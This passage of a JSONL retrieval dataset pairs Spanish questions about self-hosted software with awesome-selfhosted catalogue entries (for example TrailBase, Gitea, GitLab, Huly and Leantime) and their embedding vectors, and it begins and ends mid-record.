-0.00842, -0.02844, 0.0335, 0.02123, -0.0092, -0.05053, -0.02604, -0.07917, -0.02281, -0.03755, -0.00654, 0.15372, 0.00429, 0.01402, -0.04552, -0.06083, 0.05442, -0.0255, -0.03604, -0.01256, -0.03589, 0.01758, -0.11772, -0.07016, -0.02595, 0.01089, -0.02438, -0.00687, 0.0403, -0.11617, -0.06594, -0.00768, -0.02864, -0.07252, 0.02163, 0.01017, 0.06735, -0.06039, 0.01675, 0.08675, -0.06123, -0.00852, 0.03694, 0.09111, 0.06959, -0.02685, 0.03548, 0.07193, -0.10322, -0.00352, 0.01633, -0.03544, -0.04853, 0.02347, -0.05565, -0.08565, -0.01271, 0.02749, 0.01838, -0.05727, -0.08696, -0.06596, 0.03065, -0.00148, -0.03986, -0.02077, 0.03573, 0.01704, 0.05439, 0.04806, -0.0464, -0.0022, -0.03793, -0.00663, -0.08003, -0.01475, -0.04557, 0.01253, -0.02662, -0.0228, 0.08477, -0.08628, 0.09308, 0.03545, 0.07211, 0.05027, -0.00653, 0.0617, -0.02463, 0.01115, -0.02968, 0.03489, -0.00806, 0.01838, 0.03445, 0.00919, 0.01982, 0.01845, 0.02747, -0.00263, -0.0149, 0.01768, 0.06963, 0.02087, 0.04078, -0.02873, -0.00794, -0.0279, -0.02696, 0.01403, 0.0157, 0.02716, -0.04616, 0.00128, -0.07191, 0.00201, 0.11572, -0.05714, -0.05925, -0.01424, -0.06458, -0.07846, -0.00215, -0.0379, -0.0417, -0.07142, 0.03387, 0.06785, -0.03378, 0.04973, -0.00294]} +{"tipo": "pregunta", "herramienta": "Software Development - Low Code", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Low Code", "tema": "software development - low code", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Low Code: TrailBase β€” Open, sub-millisecond, single-executable FireBase alternative with type-safe REST & realtime APIs, built-in JS/TS runtime, auth & admin UI [OSL-3.0, Rust/Docker].", "indexar": "cual es la mejor opciΓ³n open source para autenticaciΓ³n de usuarios y gestiΓ³n de bases de datos", "v": [-0.10309, 0.09583, -0.05988, -0.14337, 0.05712, -0.1371, -0.01612, -0.10747, -0.19387, -0.03448, -0.12754, -0.25959, -0.02922, 0.02888, -0.03563, -0.08577, 0.07362, -0.06758, 0.01994, -0.04785, -0.02804, -0.04684, -0.00532, -0.02747, -0.12767, -0.02227, 0.03196, -0.06179, -0.07148, 0.08938, 0.09178, -0.07129, -0.07556, 0.01901, 0.01657, 0.07394, -0.04677, 0.12604, 0.02446, 0.00329, -0.05753, -0.01994, -0.06918, 0.13503, 0.20894, 0.02686, -0.03475, 0.09687, 0.02439, -0.10876, -0.10017, -0.06084, -0.12218, -0.03542, -0.07727, -0.05632, 0.07869, -0.10845, 0.0989, 0.03768, -0.14163, 0.02977, -0.00472, -0.04216, -0.00234, -0.04428, 0.09763, 0.04237, -0.03219, 0.12265, 0.03078, 0.08676, -0.02905, 0.0209, 0.01788, -0.02186, 0.08318, 0.01505, -0.01632, 0.07112, 0.04203, -0.0373, -0.02513, 0.05837, -0.10357, -0.01548, 0.05217, -0.04918, 0.00313, -0.02128, 0.08823, -0.02041, -0.03223, 0.03518, 0.02479, -0.039, -0.00381, -0.05792, -0.00834, 0.05962, 0.02282, -0.003, -0.00745, 0.07239, 0.05181, 0.06741, 0.07539, -0.09528, -0.09937, -0.04663, -0.07439, -0.10633, -0.02592, 0.05454, 0.01367, -0.07868, -0.03131, -0.07961, -0.03271, -0.0178, -0.02131, -0.1331, 0.02108, -0.09136, 0.06064, 0.02228, 0.02318, 0.05625, 0.01773, 0.04754, -0.05227, -0.06694, -0.06867, 0.02403, 0.02599, -0.02283, 0.02747, 0.00593, 0.01372, -0.02091, -0.07916, 0.06845, -0.02623, -0.01002, 0.08875, -0.0987, -0.02319, 0.03224, -0.07732, 0.0167, -0.01731, -0.00897, 0.03207, 0.07104, -0.12764, 0.05817, -0.02207, -0.05047, -0.07073, 0.04262, -0.01776, 0.02801, -0.07596, 0.01721, -0.0425, -0.05978, 0.03489, 0.06568, 0.01969, -0.00831, 0.01026, 0.11637, -0.0199, -0.06377, 0.05093, -0.1058, -0.06235, -0.12545, -0.01697, -0.0026, 0.0421, -0.09275, 0.00238, 0.02812, 0.03653, -0.01932, -0.02242, -0.05327, -0.01863, -0.00347, -0.00554, 0.04859, 0.00946, 0.01504, 0.0758, -0.07867, -0.01242, 0.01715, 0.04518, 0.0258, -0.07309, 0.03925, -0.01145, -0.00425, 0.03597, 0.03308, -0.01373, -0.06278, -0.00251, -0.05296, 0.00973, -0.00585, 0.04744, -0.03776, -0.05236, -0.03424, 0.03641, -0.02778, 0.03568, -0.04868, -0.07314, 0.02341, 0.04238, -0.01044, 0.00484, -0.0016, 0.02888, -0.05156, 0.01259, -0.03116, 0.02863, -0.01513, -0.01476, -0.01877, 0.03636, -0.02903, 0.00031, -0.01381, 0.02003, -0.09368, 0.00324, 0.10525, -0.03614, -0.07281, 0.02766, 0.00054, -0.08308, 0.05197, -0.0263, -0.11029, -0.06688, -0.04847, 0.01949, 0.00507, 0.00414, -0.06298]} +{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: Cgit β€” Fast lightweight web interface for git repositories [GPL-2.0, C]. Forgejo β€” A lightweight software forge focused on scaling, federation, and privacy (fork of Gitea) [MIT, Docker/Go]. Fossil β€” Distributed version control system featuring wiki and bug tracker [BSD-2-Clause-FreeBSD, C]. Gerrit β€” Code review and project management tool for Git-based projects [Apache-2.0, Java/Docker]. gitbucket β€” Git platform powered with easy installation, high extensibility & GitHub API compatibility (alternative to GitHub) [Apache-2.0, Scala/Java]. Gitea β€” Git with a cup of tea! Painless self-hosted all-in-one software development service, including Git hosting, code review, team collaboration, package registry and CI/CD [MIT, Go/Docker/K8S]. GitLab β€” Self Hosted Git repository management, code reviews, issue tracking, activity feeds and wikis [MIT, Ruby/deb/Docker/K8S]. Gogs β€” Painless self-hosted Git Service written in Go [MIT, Go].", "indexar": "quΓ© herramienta de gestiΓ³n de proyectos tiene interfaz web ligera para repositorios git?", "v": [0.03478, -0.03124, -0.14587, -0.22329, 0.23307, -0.16075, -0.10978, 0.01523, -0.07407, -0.03154, 0.03498, -0.01747, 0.00962, -0.01992, 0.21059, 0.01722, 0.08808, -0.10795, -0.03785, -0.12567, -0.09893, 0.12843, 0.0062, -0.07272, -0.08778, -0.03519, 0.16944, -0.05316, -0.08043, 0.08728, -0.03985, -0.02258, 0.05955, 0.00118, -0.15596, 0.02254, 0.02606, 0.07718, 0.02192, 0.05531, -0.01362, 0.01428, -0.05821, 0.09732, 0.05386, -0.13942, 0.05135, -0.05884, 0.02193, -0.00533, -0.10729, -0.0866, -0.10168, 0.07361, 0.06042, -0.06864, 0.19594, -0.19001, 0.04914, -0.02906, -0.15468, 0.06159, -0.02405, -0.05114, 0.04607, -0.04252, -0.08898, -0.05521, -0.0982, 0.07638, -0.00536, 0.09363, 0.03881, -0.02517, 0.02293, -0.01463, -0.03519, 0.02402, -0.02377, -0.00649, 0.07318, -0.02965, -0.01364, 0.05162, -0.08972, -0.09511, 0.02768, -0.05872, 0.0416, -0.03222, -0.06176, 0.00759, -0.07202, -0.08382, 0.02621, -0.06509, 0.08553, -0.0026, 0.01853, -0.10582, -0.01945, -0.04252, -0.08169, 0.03699, 0.0007, 0.08163, 0.04688, -0.03466, -0.09579, 0.04122, 0.0654, 0.02305, 0.03195, 0.01438, -0.02966, 0.08216, -0.02068, 0.00379, 0.00497, -0.10678, 0.05197, -0.04329, -0.06657, -0.00084, 0.00201, 0.00743, -0.00465, 0.05863, -0.01552, -0.09103, 0.00025, -0.11385, -0.0915, 0.00522, -0.08292, 0.03645, -0.01134, -0.08129, 0.0225, -0.01349, -0.02609, 0.02509, -0.03048, 0.00119, 0.05883, -0.00103, 0.04849, -0.00307, -0.01358, -0.00366, 0.09031, -0.06188, 0.02357, 0.03082, -0.10543, -0.01671, -0.00527, 0.0311, -0.09393, 0.0063, -0.0161, -0.00873, -0.01524, 0.06544, 0.02364, -0.02463, -0.01521, 0.08446, 0.04284, 0.06531, 0.0572, 0.0257, 0.00983, -0.05314, 0.00606, -0.09028, -0.03403, -0.07856, 0.04309, -0.09885, -0.04617, -0.00861, 0.00345, 0.05161, -0.0059, -0.05178, -0.01306, -0.00917, -0.04523, 0.07026, -0.04465, 0.04269, -0.00472, -0.04426, 0.10447, 0.04896, 8e-05, -0.05932, 0.00998, 0.0022, -0.02555, -0.03122, 0.05099, -0.04554, -0.03518, 0.06423, -0.02749, 0.00743, -0.01337, 0.04649, 0.04902, 0.02566, 0.02601, 0.00245, 0.00165, -0.02556, 0.01454, 0.02707, 0.04134, -0.043, -0.00919, -0.01518, 0.02444, 0.04006, 0.06189, -0.00729, 0.01053, -0.00211, -0.00713, 0.00564, 0.01963, -0.05632, -0.01522, -0.04563, 0.02977, -0.05967, 0.01003, 0.02293, -0.03929, -0.01122, -0.0213, 0.05565, -0.00626, -0.01771, -0.01794, -0.03308, -0.00879, -0.02718, -0.0299, -0.04132, -0.05226, -0.00061, 0.03133, -0.02846, -0.02183, 0.02586]} +{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: Cgit β€” Fast lightweight web interface for git repositories [GPL-2.0, C]. Forgejo β€” A lightweight software forge focused on scaling, federation, and privacy (fork of Gitea) [MIT, Docker/Go]. Fossil β€” Distributed version control system featuring wiki and bug tracker [BSD-2-Clause-FreeBSD, C]. Gerrit β€” Code review and project management tool for Git-based projects [Apache-2.0, Java/Docker]. gitbucket β€” Git platform powered with easy installation, high extensibility & GitHub API compatibility (alternative to GitHub) [Apache-2.0, Scala/Java]. Gitea β€” Git with a cup of tea! Painless self-hosted all-in-one software development service, including Git hosting, code review, team collaboration, package registry and CI/CD [MIT, Go/Docker/K8S]. GitLab β€” Self Hosted Git repository management, code reviews, issue tracking, activity feeds and wikis [MIT, Ruby/deb/Docker/K8S]. Gogs β€” Painless self-hosted Git Service written in Go [MIT, Go].", "indexar": "cuΓ‘l es una alternativa libre y autoalojable a GitHub con revisiΓ³n de cΓ³digo?", "v": [-0.05431, -0.04651, -0.07868, -0.03597, -0.03206, -0.15815, -0.05137, 0.04865, -0.16713, -0.03665, -0.05563, -0.28303, -0.02224, 0.16163, 0.11909, -0.11418, 0.08475, -0.16502, -0.03681, -0.00726, -0.05388, 0.05967, -0.02667, -0.10115, -0.02146, -0.04979, 0.04777, 0.02769, -0.07185, -0.02771, 0.04756, -0.08051, 0.01901, -0.00554, -0.15871, 0.12827, 0.25786, 0.15675, 0.06137, 0.04535, -0.01313, -0.04409, -0.0449, 0.02988, 0.01745, -0.08966, 0.01711, 0.10629, -0.11713, 0.02613, -0.10371, 0.04255, -0.03845, 0.0024, 0.01137, 0.0274, 0.10602, -0.05511, -0.13182, -0.04814, -0.02336, -0.03794, 0.01034, -0.05025, -0.05115, 0.03535, 0.01047, 0.12124, -0.12101, 0.06569, -0.03209, -0.0462, -0.02548, -0.02708, -0.02121, -0.00123, -0.06209, -0.03095, -0.0508, 0.1388, 0.08516, 0.01278, -0.03536, 0.04582, 0.02483, -0.0177, 0.0047, -0.10484, 0.02319, -0.01534, 0.02997, -0.00296, -0.01813, 0.13499, -0.12423, -0.00183, 0.02045, 0.00808, 0.01018, -0.03825, 0.13229, -0.07151, 0.00616, 0.05966, 0.0984, 0.04764, 0.04791, 0.04657, -0.03965, -0.00428, 0.00947, 0.01761, -0.09305, 0.03792, 0.00246, -0.01689, -0.06813, 0.06662, -0.06052, -0.02987, -0.01238, 0.04562, -0.10031, -0.06658, 0.02712, 0.11049, 0.07048, 0.07745, -0.02472, -0.0277, -0.00099, -0.05552, -0.07475, -0.04638, -0.06068, 0.01081, 0.05472, 0.01558, 0.02486, 0.03239, 5e-05, 0.05644, 0.12161, 0.1691, 0.10102, -0.02157, -0.02853, -0.01643, 0.00898, 0.01103, -0.07984, 0.05482, -0.02668, 0.02995, -0.07395, 0.00777, -0.04456, 0.0267, -0.05261, 0.01248, -0.00013, 0.02268, -0.0405, 0.02926, 0.0549, 0.00579, 0.04847, 0.01392, -0.02762, -0.05229, 0.05696, 0.06072, 0.09009, -0.07274, 0.0866, -0.06364, 0.03788, -0.05804, -0.07036, -0.03891, -0.02167, 0.00713, -0.0404, -0.04324, 0.01899, -0.03555, 0.04345, 0.02753, 0.02815, -0.01313, -0.02199, 0.04867, 0.01883, -0.04115, 0.05353, 0.04044, -0.02237, -0.00822, -0.05528, 0.00566, -0.05333, -0.00899, 0.01532, -0.02424, -0.01492, 0.0095, -0.00225, 0.0423, -0.02259, 0.04683, 0.01113, -0.03167, 0.04971, -0.00344, -0.03479, 0.02182, -0.03055, 0.05199, 0.03017, -0.06077, 0.02164, -0.03125, -0.00865, -0.03167, -0.04761, -0.00442, 0.00932, 0.04471, -0.05313, -0.03415, 0.06902, 0.00552, -0.00811, 0.03585, 0.00564, 0.04602, -0.03665, 0.03951, 0.02216, -0.01148, -0.02231, 0.01474, -0.03933, -0.01483, -0.03845, 0.04285, -0.01517, -0.03383, -0.04933, -0.03769, -0.09172, -0.01235, 0.02539, -0.02125, -0.01905, 0.01935]} +{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: Cgit β€” Fast lightweight web interface for git repositories [GPL-2.0, C]. Forgejo β€” A lightweight software forge focused on scaling, federation, and privacy (fork of Gitea) [MIT, Docker/Go]. Fossil β€” Distributed version control system featuring wiki and bug tracker [BSD-2-Clause-FreeBSD, C]. Gerrit β€” Code review and project management tool for Git-based projects [Apache-2.0, Java/Docker]. gitbucket β€” Git platform powered with easy installation, high extensibility & GitHub API compatibility (alternative to GitHub) [Apache-2.0, Scala/Java]. Gitea β€” Git with a cup of tea! Painless self-hosted all-in-one software development service, including Git hosting, code review, team collaboration, package registry and CI/CD [MIT, Go/Docker/K8S]. GitLab β€” Self Hosted Git repository management, code reviews, issue tracking, activity feeds and wikis [MIT, Ruby/deb/Docker/K8S]. Gogs β€” Painless self-hosted Git Service written in Go [MIT, Go].", "indexar": "con quΓ© programa puedo gestionar versiones, bug reports y revisiones de forma distribuida?", "v": [0.03986, 0.06654, -0.11606, -0.24699, 0.09089, -0.01919, 0.01912, -0.07678, -0.12707, -0.12009, -0.04306, -0.2028, -0.05548, -0.06433, 0.01977, -0.06703, -0.01482, -0.10899, 0.00289, -0.07579, 0.02296, -0.02713, 0.05143, -0.00863, -0.03085, 0.05904, 0.07858, -0.03594, 0.01441, -0.03077, 0.0125, -0.0731, 0.04907, -0.10304, -0.15045, 0.19505, -0.00377, -0.0183, 0.00083, 0.03206, -0.0207, -0.03976, -0.00243, -0.04416, 0.107, -0.1573, 0.06285, 0.01338, 0.07933, -0.03944, -0.06444, -0.02317, -0.07622, 0.07842, 0.04447, -0.16384, 0.06107, -0.14828, 0.03619, 0.03942, -0.05875, 0.08958, -0.01981, -0.08633, 0.02604, 0.00124, 0.00032, -0.07413, -0.08584, 0.1238, -0.0221, 0.0036, 0.11068, 0.00344, -0.07105, -0.05239, -0.00026, -0.02277, -0.0973, -0.00596, 0.02737, -0.00321, -0.00505, 0.09298, -0.01033, -0.05513, -0.06548, -0.06448, -0.08426, -0.07551, 0.01241, -0.11499, 0.00032, -0.0201, 0.03342, -0.02169, 0.14274, -0.03239, 0.01811, -0.0717, -0.03952, -0.01994, -0.05145, 0.18251, -0.11787, 0.0967, 0.09906, -0.05177, -0.04862, 0.04564, 0.0053, -0.03918, -0.02801, 0.04343, 0.00163, 0.06532, 0.00818, 0.04867, 0.02202, -0.03094, -0.0408, -0.01505, -0.02739, 0.01594, 0.13815, -0.00685, 1e-05, 0.13969, -0.0332, 0.05075, -0.0079, 0.01936, -0.02362, -0.02153, -0.0458, -0.01706, -0.02325, 0.03469, 0.00794, -0.10681, -0.06898, 0.096, 0.07459, 0.09584, 0.08076, -0.01305, -0.0562, -0.05804, -0.01928, -0.01766, 0.07625, -0.03362, 0.01972, 0.02038, -0.05803, -0.05942, 0.03776, -0.01919, -0.09304, 0.08563, 0.00123, 0.04403, -0.01111, -0.03788, 0.03322, -0.01694, 0.031, 0.05575, 0.05305, -0.00259, -0.02209, 0.04681, 0.02227, -0.06236, 0.05619, -0.05194, -0.04223, -0.0637, 0.0398, 0.02453, -0.01846, -0.01268, -0.03606, 0.02818, -0.01977, -0.05829, -0.05988, 0.08471, -0.01702, -0.0498, 0.04705, 0.04446, 0.01881, -0.05425, 0.07831, -0.01103, -0.02831, 0.00169, 0.01403, -0.01255, -0.13197, -0.00314, 0.01397, -0.03575, 0.05516, 0.06899, -0.00552, 0.08026, 0.0746, 0.06844, 0.02676, 0.02066, -0.03242, 0.00062, -0.01357, -0.01653, 0.01652, 0.01525, 0.05363, -0.01151, 0.00765, -0.04091, 0.06212, -0.0173, 0.04175, -0.07792, 0.03183, 0.00329, 0.05405, 0.02808, 0.01225, 0.04075, 0.04593, -0.01126, 0.02215, -0.03044, 0.07351, 0.01433, 0.00752, -0.11022, -0.05344, 0.04447, 0.09207, -0.03641, -0.03172, -0.04174, -0.01003, 0.02335, -0.02212, 0.00325, -0.09178, 0.02331, 0.02355, -0.08698, -0.01115, 0.00776]} +{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: Huly β€” All-in-one project management platform (alternative to Linear, Jira, Slack, Notion, Motion) [EPL-2.0, Docker/K8S/Nodejs]. Ideon β€” Project workspace built around an infinite canvas; embed GitHub, GitLab, Gitea, and Forgejo repositories alongside notes, links, and tasks, with real-time collaboration [AGPL-3.0, Docker]. Kaneo β€” Project management platform focused on simplicity and efficiency [MIT, K8S/Docker]. Leantime β€” Lean project management system for small teams and startups helping to manage projects from ideation through delivery [AGPL-3.0, PHP/Docker]. Mindwendel β€” Brainstorm and upvote ideas and thoughts within your team [AGPL-3.0, Docker/Elixir]. minimal-git-server β€” Lightweight git server with a basic CLI to manage repositories, supporting multiple accounts and running in a container [MIT, Docker]. Octobox β€” Take back control of your GitHub Notifications [⚠, AGPL-3.0, Ruby/Docker].", "indexar": "quΓ© programa me sirve para gestionar proyectos desde la idea hasta la entrega?", "v": [-0.10611, 0.15978, -0.1905, -0.1791, 0.10364, -0.1037, 0.01243, -0.02256, -0.09619, -0.09599, -0.10629, -0.08709, 0.08153, -0.12395, 0.05586, 0.0666, 0.20063, -0.05983, 0.03572, 0.01994, -0.02663, 0.0962, 0.01468, -0.12412, -0.13851, -0.00774, 0.07153, -0.08155, 0.02927, 0.09776, 0.02352, -0.07319, 0.05963, -0.13378, 0.05479, -0.01261, 0.02498, 0.07155, 0.02717, 0.00561, -0.03657, 0.01425, 0.01173, 0.02139, 0.13272, -0.08128, 0.11168, -0.06534, -0.003, -0.03197, -0.12836, -0.03428, -0.0404, 0.01473, 0.07156, 0.0006, -0.0302, -0.21431, -0.03803, 0.01245, -0.05183, 0.04806, -0.0111, -0.11765, 0.11108, -0.0407, -0.0211, -0.01064, -0.08334, -0.01541, -0.00207, 0.02899, 0.03084, -0.11471, 0.01818, -0.01458, -0.01032, 0.01116, -0.03403, -0.03718, 0.0726, 0.0038, -0.06898, 0.00217, 0.04996, -0.0613, 0.01487, -0.01863, -0.01727, -0.01165, -0.03974, 0.00478, -0.03799, -0.02718, -0.02239, -0.00681, 0.11799, 0.03785, 0.02858, 0.02331, -0.03423, -0.07964, -0.12344, 0.05646, -0.04968, 0.11706, 0.05971, 0.00026, -0.04852, 0.04346, -0.13088, 0.03393, 0.01613, -0.06694, -0.12728, 0.03263, 0.02397, -0.01269, 0.02631, 0.00935, -0.08368, 0.00817, 0.02225, 0.07846, 0.08607, -0.05198, -0.06002, 0.08181, -0.01452, 0.10601, -0.03678, -0.00193, -0.01219, 0.00578, -0.07419, -0.05094, 0.02733, -0.0576, -0.02402, -0.02355, -0.00846, 0.11378, 0.01518, 0.01845, -0.02092, -0.07365, 0.04797, -0.02731, 0.10945, 0.0193, 0.06724, -0.05453, 0.04782, 0.02397, -0.07444, 0.01172, 0.03984, -0.0183, -0.05016, 0.07372, -0.04637, -0.00776, -0.00458, 0.00658, 0.02898, -0.08403, -0.02731, 0.06422, 0.0613, 0.13385, 0.01085, 0.04295, -0.00342, -0.00541, 0.05155, -0.08702, -0.02447, -0.112, 0.05381, -0.03234, -0.10191, 0.09516, 0.02251, 0.07069, -0.01026, -0.07077, -0.0709, 0.06687, 0.01354, 0.04953, -0.00632, 0.00749, 0.00472, -0.03406, 0.01237, -0.02338, -1e-05, 0.01561, 0.03671, 0.03214, -0.04847, -0.04771, 0.04838, 0.05415, -0.03415, 0.075, -0.05215, 0.04956, 0.06289, 0.1382, 0.02449, -0.031, 0.04475, 0.0234, -0.01443, 0.01091, -0.00865, 0.0421, 0.0739, 0.00121, 0.00395, -0.05786, -0.00451, 0.02448, -0.00444, -0.00422, 0.04531, 0.06342, 0.02432, 0.02223, 0.01112, -0.02862, -0.01672, 0.0112, 0.02861, -0.07339, -0.00369, -0.0236, -0.01823, -0.09011, -0.00631, 0.10025, -0.02132, -0.01627, -0.00975, -0.01142, -0.05925, 0.00184, -0.07367, 2e-05, -0.07242, 0.05602, 0.01396, -0.00921, 0.03391, 0.04226]} +{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: Huly β€” All-in-one project management platform (alternative to Linear, Jira, Slack, Notion, Motion) [EPL-2.0, Docker/K8S/Nodejs]. Ideon β€” Project workspace built around an infinite canvas; embed GitHub, GitLab, Gitea, and Forgejo repositories alongside notes, links, and tasks, with real-time collaboration [AGPL-3.0, Docker]. Kaneo β€” Project management platform focused on simplicity and efficiency [MIT, K8S/Docker]. Leantime β€” Lean project management system for small teams and startups helping to manage projects from ideation through delivery [AGPL-3.0, PHP/Docker]. Mindwendel β€” Brainstorm and upvote ideas and thoughts within your team [AGPL-3.0, Docker/Elixir]. minimal-git-server β€” Lightweight git server with a basic CLI to manage repositories, supporting multiple accounts and running in a container [MIT, Docker]. Octobox β€” Take back control of your GitHub Notifications [⚠, AGPL-3.0, Ruby/Docker].", "indexar": "cual es una alternativa libre a Jira y Slack que funcione con contenedores?", "v": [0.03307, -0.06191, -0.21631, 0.0618, 0.09358, -0.19122, -0.04776, -0.04916, -0.07626, -0.02762, -0.12884, -0.16618, 0.02054, 0.03554, 0.11742, 0.07763, 0.01795, -0.13929, -0.06229, -0.02429, -0.16744, -0.00877, -0.06153, -0.07926, -0.05479, -0.02532, 0.08068, -0.01955, -0.11965, 0.01789, 0.01324, 0.02225, 0.18957, 0.01247, 0.09777, -0.04451, -0.00039, 0.03108, 0.09998, 0.00347, 0.08888, -0.02137, -0.06099, -0.06243, -0.1504, 0.10646, 0.0165, -0.00843, 0.00083, 0.11701, -0.1042, -0.02747, -0.10384, 0.11194, -0.05328, 0.03352, 0.06463, -0.04991, 0.08431, -0.01087, -0.06762, 0.10298, 0.03056, -0.07041, 0.07275, -0.01957, -0.03704, -0.03643, -0.01464, 0.04425, 0.00731, 0.03054, -0.01537, -0.08172, -0.0684, 0.13175, -0.04543, 0.08767, 0.00317, 0.06923, 0.04317, -0.11053, 0.04829, 0.0107, -0.0323, -0.08253, 0.02966, -0.10158, -0.01376, -0.00379, -0.04081, -0.0187, 0.01561, 0.18422, -0.01844, -0.0742, 0.00162, 0.07703, -0.00722, 0.00917, 0.10515, 0.03009, -0.07875, -0.02982, 0.04403, 0.0754, 0.0644, -0.05667, 0.03709, -0.01735, 0.0643, 0.04128, 0.05224, -0.05405, -0.06295, -0.06218, -0.10289, -0.07287, -0.01608, 0.0091, -0.0392, -0.06421, -0.09054, -0.02923, 0.08529, 0.02296, 0.01419, 0.01852, -0.07674, 0.01038, 0.05057, -0.02232, -0.04889, -0.08016, -0.08874, -0.07995, 0.05516, -0.04716, 0.03357, -0.01784, -0.01905, 0.01643, 0.04422, -0.01632, 0.07002, 0.01467, 0.03791, 0.03144, -0.04202, -0.00759, -0.01157, -0.00145, 0.01605, 0.0928, -0.01077, 0.07067, 0.01226, -0.0426, -0.0498, 0.09315, -0.04365, -0.02341, 0.01873, 0.04363, -0.0629, 0.004, 0.0079, -0.02123, -0.10779, 0.01047, 0.03689, 0.00687, 0.0292, -0.02032, 0.00144, -0.07604, -0.06657, -0.06038, 0.12947, -0.08471, -0.01146, 0.04994, -0.05953, 0.00099, -0.00917, -0.15116, -0.04118, -0.00835, 0.0321, 0.07312, -0.02177, 0.0348, -0.06585, -0.10972, -0.09771, 0.00421, 0.01441, -0.07966, 0.00427, 0.07026, -0.05786, -0.00433, 0.0356, -0.02852, -0.04056, 0.02984, -0.08566, 0.01945, 0.06532, 0.04914, 0.04716, -0.01182, 0.07443, -0.03682, -0.02411, 0.03643, 0.0093, 0.00421, 0.01498, 0.01643, -0.01576, -0.00022, 0.03897, -0.04188, -0.02265, -0.00471, 0.04408, 0.09221, 0.01896, 0.04223, 0.00446, 0.02324, 0.00949, -0.02825, 0.04635, 0.01307, -0.0111, 0.03174, -0.01227, -0.01768, 0.0112, 0.07343, -0.01955, -0.01723, -0.01478, 0.02462, -0.10732, 0.01761, 0.01318, -0.0637, 0.01097, 0.09194, -0.00665, -0.00743, 0.01672, -0.00208]} +{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: Huly β€” All-in-one project management platform (alternative to Linear, Jira, Slack, Notion, Motion) [EPL-2.0, Docker/K8S/Nodejs]. Ideon β€” Project workspace built around an infinite canvas; embed GitHub, GitLab, Gitea, and Forgejo repositories alongside notes, links, and tasks, with real-time collaboration [AGPL-3.0, Docker]. Kaneo β€” Project management platform focused on simplicity and efficiency [MIT, K8S/Docker]. Leantime β€” Lean project management system for small teams and startups helping to manage projects from ideation through delivery [AGPL-3.0, PHP/Docker]. Mindwendel β€” Brainstorm and upvote ideas and thoughts within your team [AGPL-3.0, Docker/Elixir]. minimal-git-server β€” Lightweight git server with a basic CLI to manage repositories, supporting multiple accounts and running in a container [MIT, Docker]. Octobox β€” Take back control of your GitHub Notifications [⚠, AGPL-3.0, Ruby/Docker].", "indexar": "con quΓ© puedo montar un espacio de trabajo para proyectos colaborativo en tiempo real?", "v": [0.10952, 0.13845, -0.19952, -0.06807, -0.02117, -0.10336, 0.02852, 0.04556, -0.03245, -0.13776, -0.05574, -0.06924, 0.06831, -0.01322, 0.08916, 0.09313, 0.17001, -0.08011, -0.07169, -0.02601, -0.00673, -0.08752, -0.10598, 0.02373, 0.12442, -0.07339, 0.02179, -0.0663, -0.08086, 0.12121, 0.07141, 0.12881, 0.0684, 0.01368, 0.02861, -0.10869, 0.08015, 0.06132, -0.00238, -0.05451, -0.01428, 0.01321, -0.06847, 0.03673, 0.01304, 0.02195, -0.01563, -0.17561, -0.109, 0.07942, -0.11973, -0.03256, -0.02344, -0.00794, -0.00731, -0.06559, 0.1983, -0.10116, -0.01231, -0.04817, -0.07316, 0.11338, -0.11742, -0.05262, 0.12493, 0.04821, -0.03102, 0.04051, -0.06678, 0.07948, -0.04571, -0.00121, -0.00501, -0.17781, 0.01506, 0.05361, -0.02813, -0.04393, -0.03399, -0.06063, 0.06961, 0.05391, 0.05309, 0.08366, -0.01859, -0.01896, 0.0534, -0.14059, -0.02443, 0.03453, -0.06609, 0.12167, 0.0446, -0.02217, -0.00691, -0.03292, 0.03946, 0.04789, -0.00654, 0.04384, -0.03526, -0.05184, -0.08149, -0.03858, 0.03662, 0.14107, -0.04145, 0.03248, -0.0328, -0.06533, -0.01897, 0.04673, -0.06728, -0.07696, -0.05996, -0.11264, -0.02397, 0.02652, 0.00901, -0.0891, -0.01364, 0.05027, 0.01525, 0.02487, 0.01693, -0.06447, 0.08336, -0.00307, 0.02688, -0.05637, -0.10613, 0.04691, -0.05871, 0.01377, -0.01964, 0.01535, 0.01675, 0.02115, -0.03249, -0.05058, 0.0454, -0.00232, 0.01781, -0.07105, -0.06438, 0.06918, 0.03518, -0.0288, -0.00455, -0.04621, 0.05473, 0.04805, 0.00428, 0.01118, -0.07356, -0.00472, 0.03415, 0.03885, 0.00253, 0.02207, 0.01155, 0.09444, -0.06432, 0.00152, -0.04496, -0.06622, -0.02765, 0.03223, 0.09503, 0.06109, -0.04528, 0.03333, 0.0357, -0.08029, 0.02348, -0.00776, -0.03487, -0.06652, 0.0226, -0.09399, -0.06625, 0.01455, -0.0235, 0.04621, 0.03752, 